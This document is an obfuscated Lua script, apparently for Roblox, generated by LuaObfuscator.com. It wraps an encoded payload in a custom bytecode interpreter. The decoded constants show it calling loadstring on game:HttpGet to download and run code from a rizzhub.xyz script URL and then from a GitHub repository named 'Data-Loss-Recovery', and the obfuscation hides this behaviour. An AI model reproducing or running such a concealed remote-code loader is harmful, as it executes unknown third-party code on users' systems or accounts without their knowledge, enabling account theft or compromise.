--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==3) then function v25()local v31=1386 -(203 + 911 + 272) ;local v32;local v33;local v34;local v35;local v36;local v37;while true do if ((0 -0)==v31) then v32=v24();v33=v24();v31=1;end if (v31==(4 -2)) then v36=v21(v33,21,1422 -(426 + 965) );v37=((v21(v33,69 -(9 + 28) )==(3 -2)) and  -(1064 -(645 + 418))) or (1 -0) ;v31=6 -(1566 -(545 + 1018)) ;end if (v31==(2 + 1)) then if (v36==(387 -(303 + (173 -89)))) then if (v35==0) then return v37 * (0 -0) ;else v36=958 -(282 + 675) ;v34=0 -0 ;end elseif (v36==(3652 -(826 + 779))) then return ((v35==0) and (v37 * (((40 + 803) -(7 + 835))/(0 + 0)))) or (v37 * NaN) ;end return v8(v37,v36-(1801 -(107 + 671)) ) * (v34 + (v35/(2^(174 -122)))) ;end if (v31==((1 + 0) -0)) then v34=102 -(25 + 76) ;v35=(v21(v33,1 + (1249 -(218 + 1031)) ,2 + 18 ) * ((3 -1)^(20 + (1070 -(955 + 103))))) + v32 ;v31=2;end end end v26=nil;function v26(v38)local v39;if  not v38 then local v75=1169 -(1159 + 10) ;while true do if (v75==(0 + (0 -0))) then v38=v24();if (v38==(0 -0)) then return "";end break;end end end v39=v3(v16,v19,(v19 + v38) -(4 -3) );v19=v19 + v38 ;local v40={};for v68=1 + 0 + 0 , #v39 do v40[v68]=v2(v1(v3(v39,v68,v68)));end return v6(v40);end v27=v24;v18=4;end if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v41)if (v1(v41,2)==79) then v20=v0(v3(v41,1,1));return "";else local v76=0;local v77;while true do if (v76==0) then v77=v2(v0(v41,16));if v20 then local v100=v5(v77,v20);v20=nil;return v100;else return v77;end break;end end end end);v21=nil;v18=1;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v42=461 -(388 + 73) ;local v43;local v44;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v42==(5 -3)) then v47=nil;v48=nil;v42=3;end if (v42==(3 + 0)) then v49=nil;v50=nil;v42=7 -3 ;end if ((1262 -(40 + 1221))==v42) then v45=nil;v46=nil;v42=797 -(389 + 406) ;end if (4~=v42) then else while true do if ((8 -6)==v43) then v48=nil;v49=nil;v43=3;end if ((0 -0)~=v43) then else v44=0;v45=nil;v43=1;end if (v43==(191 -(155 + 33))) then v50=nil;while true do local v101=0;while true do if (v101~=(1 + 0)) then else if (v44~=(1 + 0)) then else local v104=0 + 0 ;while true do if (v104==(1 + 0)) then for v126=1,v49 do local v127=0;local v128;local v129;while true do if (v127==1) then if (v128==(4 -3)) then v129=v22()~=(0 + 0) ;elseif (v128==2) then v129=v25();elseif (v128==3) then v129=v26();end v50[v126]=v129;break;end if (v127==(126 -(83 + 43))) then local v139=0 + 0 ;local v140;while true do if (v139~=(0 -0)) then else v140=906 -(329 + 577) ;while true do if (1==v140) then v127=1;break;end if ((0 + 0)==v140) then local v152=1088 -(644 + 444) ;while true do if (v152==(0 + 0)) then v128=v22();v129=nil;v152=1 -0 ;end if ((1 -0)~=v152) then else v140=1 + 0 ;break;end end end end break;end end end end end v48[3]=v22();v104=502 -(116 + 384) ;end if (v104~=(1 + 1)) then else v44=1 + 1 ;break;end if (v104~=0) then else v49=v24();v50={};v104=681 -(403 + 277) ;end end end break;end if (v101==(0 -0)) then local v103=0;while true do if (v103~=(0 -0)) then else if (v44==(1 + 1)) then local v108=310 -(175 + 135) ;local v109;while true do if (v108==(36 -(9 + 27))) then v109=0 + 0 ;while true do local v141=0 -0 ;while true do if (v141==(258 -(173 + 85))) then if (v109==(1927 -(807 + 1120))) then local v150=1175 -(1142 + 33) ;while true do if (v150==(451 -(277 + 174))) then for v159=1 -0 ,v24() do local v160=0 -0 ;local v161;local v162;local v163;while true do if (v160==(1 -0)) then v163=nil;while true do if (v161==(0 -0)) then local v170=0 + 0 ;while true do if (v170==(0 + 0)) then v162=0;v163=nil;v170=1 + 0 ;end if (v170==(378 -(283 + 94))) then v161=2 -1 ;break;end end end if (v161==1) then while true do if (v162==0) then v163=v22();if (v21(v163,1 + 0 ,1773 -(1527 + 245) )==(0 -0)) then local v171=0;local v172;local v173;local v174;local v175;local v176;while true do if (v171==(1 + 0)) then v174=nil;v175=nil;v171=1776 -(634 + 1140) ;end if (v171~=0) then else v172=0 + 0 ;v173=nil;v171=1 + 0 ;end if (v171==2) then v176=nil;while true do if (v172==0) then local v177=0 + 0 ;while true do if (v177==(0 + 0)) then v173=0 -0 ;v174=nil;v177=1 + 0 ;end if (v177~=1) then else v172=1 + 0 ;break;end end end if ((2 + 0)==v172) then while true do if ((846 -(544 + 302))~=v173) then else local v179=291 -(183 + 108) ;local v180;while true do if (v179==(0 + 0)) then v180=0 + 0 ;while true do if (v180==0) then local v188=0 + 0 ;local v189;while true do if ((0 + 0)==v188) then v189=0 -0 ;while true do if (1~=v189) then else v180=475 -(55 + 419) ;break;end if (v189==(0 + 0)) then v174=v21(v163,1 + 1 ,3);v175=v21(v163,1 + 3 ,12 -6 );v189=739 -(588 + 150) ;end end break;end end end if ((1 + 0)==v180) then v173=2 -1 ;break;end end break;end end end if (v173~=(1 + 2)) then else if (v21(v175,9 -6 ,3)==(3 -2)) then v176[4]=v50[v176[1753 -(106 + 1643) ]];end v45[v159]=v176;break;end if (v173==(2 + 0)) then local v182=463 -(258 + 205) ;local v183;while true do if (v182==0) then v183=1479 -(486 + 993) ;while true do if (v183~=(1808 -(734 + 1073))) then else v173=14 -11 ;break;end if (v183~=(0 -0)) then else if (v21(v175,15 -(8 + 6) ,1965 -(448 + 1516) )==(1 + 0)) then v176[2]=v50[v176[2 -0 ]];end if (v21(v175,1 + 1 ,2)==1) then v176[3 + 0 ]=v50[v176[3]];end v183=1 -0 ;end end break;end end end if (v173==(1 + 0)) then local v184=0 + 0 ;local v185;while true do if (0==v184) then v185=0;while true do if ((0 -0)~=v185) then else local v190=0 + 0 ;while true do if (v190==(3 -2)) then v185=1 -0 ;break;end if (v190~=(0 -0)) then else local v195=0;while true do if (0==v195) then v176={v23(),v23(),nil,nil};if (v174==(0 -0)) then local v196=0 -0 ;local v197;local v198;while true do if (v196==(1234 -(290 + 944))) then v197=590 -(417 + 173) ;v198=nil;v196=1 + 0 ;end if (v196~=1) then else while true do if (v197~=(0 + 0)) then else v198=0 + 0 ;while true do if (v198==(179 -(101 + 78))) then v176[853 -(106 + 744) ]=v23();v176[2 + 2 ]=v23();break;end end break;end end break;end end elseif (v174==1) then v176[1069 -(423 + 643) ]=v24();elseif (v174==2) then v176[3]=v24() -(2^16) ;elseif (v174~=(39 -(10 + 26))) then else local v201=1777 -(695 + 1082) ;local v202;local v203;while true do if (v201==(935 -(186 + 749))) then v202=0;v203=nil;v201=1 -0 ;end if (v201==1) then while true do if ((1494 -(531 + 963))==v202) then v203=1962 -(777 + 1185) ;while true do if (0==v203) then v176[2 + 1 ]=v24() -((854 -(259 + 593))^16) ;v176[1907 -(421 + 1482) ]=v23();break;end end break;end end break;end end end v195=1 + 0 ;end if (v195==(1 + 0)) then v190=1;break;end end end end end if (v185~=(1 -0)) then else v173=2 + 0 ;break;end end break;end end end end break;end if (v172==1) then local v178=1270 -(505 + 765) ;while true do if (v178~=(0 + 0)) then else v175=nil;v176=nil;v178=1276 -(20 + 1255) ;end if (v178==(1 + 0)) then v172=2;break;end end end end break;end end end break;end end break;end end break;end if (0~=v160) then else v161=0;v162=nil;v160=4 -3 ;end end end for v164=1,v24() do v46[v164-1 ]=v29();end v150=1512 -(228 + 1283) ;end if (v150==(1 + 0)) then v109=1;break;end end end if (v109~=1) then else for v153=1,v24() do v47[v153]=v24();end return v48;end break;end end end break;end end end if (v44~=(0 + 0)) then else local v110=0;while true do if ((1760 -(1380 + 379))==v110) then v47={};v48={v45,v46,nil,v47};v110=3 -1 ;end if ((0 + 0)==v110) then v45={};v46={};v110=404 -(11 + 392) ;end if (v110==(5 -3)) then v44=1 + 0 ;break;end end end v103=1;end if (v103==1) then v101=1 + 0 ;break;end end end end end break;end if (v43==1) then local v99=0 + 0 ;while true do if (v99==(0 + 0)) then v46=nil;v47=nil;v99=4 -3 ;end if (v99~=1) then else v43=2 + 0 ;break;end end end end break;end if (v42~=(227 -(223 + 4))) then else v43=0 -0 ;v44=nil;v42=3 -2 ;end end end v18=5;end if (v18==2) then function v23()local v51,v52=v1(v16,v19,v19 + (1521 -(994 + 525)) );v19=v19 + (1368 -(235 + 1131)) ;return (v52 * (967 -711)) + v51 ;end v24=nil;function v24()local v53,v54,v55,v56=v1(v16,v19,v19 + (1681 -(1523 + 155)) );v19=v19 + 4 ;return (v56 * 16777216) + (v55 * (230975 -165439)) + (v54 * (958 -702)) + v53 ;end v25=nil;v18=3;end if (1==v18) then function v21(v57,v58,v59)if v59 then local v78=(v57/((1336 -(1032 + 302))^(v58-(2 -1))))%((3 -1)^(((v59-(1616 -(226 + 1389))) -(v58-1)) + (692 -(232 + 459)))) ;return v78-(v78%1) ;else local v79=(2 + 0)^(v58-(1696 -(865 + 830))) ;return (((v57%(v79 + v79))>=v79) and (1637 -(1537 + 99))) or ((731 + 600) -(142 + 281 + 908)) ;end end v22=nil;function v22()local v60=1837 -(386 + 1451) ;local v61;while true do if (v60==(0 -0)) then v61=v1(v16,v19,v19);v19=v19 + (2 -1) ;v60=1 + 0 ;end if (v60==((5 -3) -1)) then return v61;end end end v23=nil;v18=2;end if (v18==5) then v30=nil;function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=1;local v71= -1;local v72={...};local v73=v12("#",...) -1 ;local function v74()local v80=v65;local v81=v66;local v82=v67;local v83=v28;local v84={};local v85={};local v86={};for v90=0,v73 do if (((3067 -(596 + 712))==(2833 -(237 + 277 + 560))) and (v90>=v82)) then v84[v90-v82 ]=v72[v90 + 1 + 0 + 0 ];else v86[v90]=v72[v90 + (1319 -(907 + 411)) ];end end local v87=(v73-v82) + 1 + 0 ;local v88;local v89;while true do local v91=0 + 0 ;local v92;while true do if ((v91==(0 -0)) or ((2758 -(40 + 432))==(2642 -1874))) then v92=0;while true do if ((2682<4251) and (v92==1)) then if ((v89<=(1369 -((6457 -5131) + (150 -111)))) or ((4474 -(795 + 713))<(5654 -2985))) then if (((15857 -12603)>=(12076 -9487)) and (v89<=1)) then if ((770>(1936 -(1640 -(204 + 190)))) and (v89>(1800 -(280 + 1520)))) then v86[v88[4 -2 ]]=v88[8 -5 ];else local v113=0;local v114;local v115;local v116;local v117;local v118;while true do if (((916 -(563 + 353))==v113) or ((4660 -(45 + 51 + 111))<(311 -(53 + 23)))) then v114=0 + 0 + 0 ;v115=nil;v113=1;end if ((v113==(7 -5)) or (((570 -(61 + 28)) + 529 + 409)>(37 + 1690))) then v118=nil;while true do if (((9577 -5097)==(1153 + 1726 + 1601)) and (v114==(3 -(2 -1)))) then for v147=v115,v71 do local v148=306 -(96 + 210) ;local v149;while true do if (((2712 -1880)<(2610 -(290 + 60 + 23))) and ((199 -(26 + 173))==v148)) then v149=0;while true do if (((5109 -((670 -(128 + 222)) + 603))<=(18085 -(13961 -(101 + 580)))) and ((0 + 0)==v149)) then v118=v118 + 1 + 0 ;v86[v147]=v116[v118];break;end end break;end end end break;end if ((v114==(0 -(1662 -(1038 + 624)))) or ((3372 -(166 + 430))>=(4707 -(644 + 621)))) then local v143=0 + 0 + 0 ;while true do if ((3499<(5332 -(682 + 103))) and (v143==(1 + 0))) then v114=(1 + 0) -0 ;break;end if ((2683<(8843 -5865)) and (v143==(0 -(0 -0)))) then v115=v88[1716 -(313 + 1401) ];v116,v117=v83(v86[v115](v13(v86,v115 + 1 ,v88[1 + 2 ])));v143=1 + 0 ;end end end if (((1 + 0)==v114) or ((2601 + 2138)>(24075 -19108))) then local v144=(3803 -2444) -((1124 -725) + 526 + 434) ;while true do if ((v144==(0 + 0)) or (2114<(2153 -(98 + 678)))) then v71=(v117 + v115) -1 ;v118=0 -0 ;v144=1 -0 ;end if ((v144==(405 -((893 -681) + 192))) or ((1716 + 735)<876)) then v114=1620 -((786 -317) + 1149) ;break;end end end end break;end if (((888 -(513 + 214))==(247 -86)) and ((4 -3)==v113)) then v116=nil;v117=nil;v113=2;end end end elseif ((v89<=2) or ((2424 -(529 + 970))>=(3440 -((624 -493) + 30)))) then v86[v88[2]]=v64[v88[3]];elseif ((((1908 -(547 + 523)) -(166 + 57))<(5675 -3657)) and (v89==(1 + 2))) then v86[v88[2 + 0 ]]=v88[3]~=(1418 -(1365 + 53)) ;elseif ((382==(1570 -(350 + 838))) and (v86[v88[1 + 0 + 1 ]]==v88[3 + 1 + 0 ])) then v70=v70 + 1 + 0 ;else v70=v88[7 -4 ];end elseif ((1243<(4610 -(874 + 105))) and (v89<=(34 -27))) then if (((4752 -(564 + 244))>=(159 + 2188)) and (v89<=(11 -6))) then local v121=0 + 0 ;local v122;local v123;while true do if ((1670>(1481 -722)) and (v121==(110 -(12 + 7 + 91)))) then v122=0;v123=nil;v121=1;end if (((3795 + 120 + 294)==4209) and (v121==(4 -3))) then while true do if (((2282 -(1479 + (1426 -(810 + 273))))<(4625 + 53)) and ((526 -(372 + 154))==v122)) then v123=v88[495 -(88 + 104 + 301) ];v86[v123]=v86[v123](v13(v86,v123 + (619 -(586 + 32)) ,v71));break;end end break;end end elseif ((v89==(238 -(108 + 124))) or ((1347 + 1967)==(4485 -2126))) then do return;end else v70=v88[1 + 2 ];end elseif ((851<((770 + 2438) -(387 + 363))) and (v89<=(815 -(594 + 213)))) then local v124=0 -0 ;local v125;while true do if ((v124==(253 -(100 + 153))) or ((5591 -(1528 + (695 -293)))==(7053 -(3617 -(159 + 121))))) then v125=v88[2];v86[v125](v86[v125 + 1 ]);break;end end elseif ((v89==(571 -(561 + 1))) or ((534 -371)>(11629 -6948))) then v86[v88[2 + 0 ]]();else local v132=0 -0 ;local v133;local v134;local v135;local v136;while true do if (((2 -1)==v132) or (1236>=(5155 -(860 + 211)))) then v135=nil;v136=nil;v132=1444 -(472 + 970) ;end if ((1957<(9181 -(4086 + 2750))) and (v132==(1431 -(655 + 776)))) then v133=699 -((2163 -1534) + 70) ;v134=nil;v132=1954 -(1346 + 607) ;end if ((v132==(3 -1)) or (3470<=(6577 -3553))) then while true do if ((v133==(1465 -((1701 -(999 + 352)) + 1115))) or ((131 + (5467 -(693 + 64)))<=(2630 -(357 + 1075)))) then v134=0 + 0 ;v135=nil;v133=1;end if (((1 -0)==v133) or ((2764 -1943)>=(7469 -5556))) then v136=nil;while true do if (((672 + 1093)<=(3585 -(1000 + (1154 -(547 + 281))))) and (v134==(371 -(304 + 66)))) then v86[v135 + (681 -(565 + 115)) ]=v136;v86[v135]=v136[v88[15 -11 ]];break;end if ((v134==(0 -0)) or (4916<=(6303 -3721))) then local v158=0 + 0 ;while true do if ((v158==(0 + 0)) or ((502 + 55)>((4938 -(15 + 255)) -(1232 + 204)))) then v135=v88[2];v136=v86[v88[11 -8 ]];v158=1 + 0 ;end if ((v158==1) or ((1087 -(9 + 10))>(6579 -(705 + 1005)))) then v134=(1 + 1) -1 ;break;end end end end break;end end break;end end end v70=v70 + 1 + 0 ;break;end if ((v92==0) or ((5345 -4003)>=(1078 + 1386))) then local v102=1902 -(1721 + (199 -(10 + 8))) ;while true do if (((13794 -10707)>(2717 + (2050 -(1309 + 519)))) and (v102==(0 + 0 + 0))) then v88=v80[v70];v89=v88[3 -2 ];v102=4 -3 ;end if (((3978 -(8 + 19))>=1692) and (v102==(2 -1))) then v92=1489 -(996 + 348 + 144) ;break;end end end end break;end end end end A,B=v28(v11(v74));if  not A[1] then local v93=0;local v94;while true do if (v93==0) then v94=v62[4][v70] or "?" ;error("Script error at ["   .. v94   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!093O00028O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403263O00682O7470733A2O2F72692O7A6875622E78797A2F736372697074732F56697375616C2E6C756103043O0077616974026O002440026O00F03F034D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F626F2O7461682O332F446174612D4C6F2O732D5265636F766572792F6D61696E2F4D61696E737472696E67001B3O0012013O00013O0026043O000F000100010004073O000F0001001202000100023O001202000200033O00200A000200020004001201000400054O0003000500016O000200054O000500013O00022O0009000100010001001202000100063O001201000200074O00080001000200010012013O00083O0026043O0001000100080004073O00010001001202000100023O001202000200033O00200A000200020004001201000400096O000200044O000500013O00022O00090001000100010004073O001A00010004073O000100012O00063O00017O001B3O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00053O00063O00063O00063O00073O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
